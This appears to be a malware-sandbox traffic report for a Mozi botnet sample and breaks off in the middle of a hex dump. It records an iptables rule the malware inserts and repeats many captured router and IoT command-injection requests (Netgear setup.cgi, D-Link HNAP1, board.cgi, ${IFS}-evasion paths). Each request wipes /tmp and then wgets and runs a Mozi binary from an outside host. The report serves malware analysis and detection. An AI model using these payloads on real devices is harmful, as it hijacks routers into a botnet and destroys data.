Source: /bin/sh (PID: 5265) Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 8080 -j ACCEPT Jump to behavior
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 81.196.113.75:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 184.86.117.97:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 210.190.146.92:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 49.44.132.19:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 104.124.230.135:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 179.40.62.87:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 204.232.228.51:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
Source: global traffic HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 45.148.37.237:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 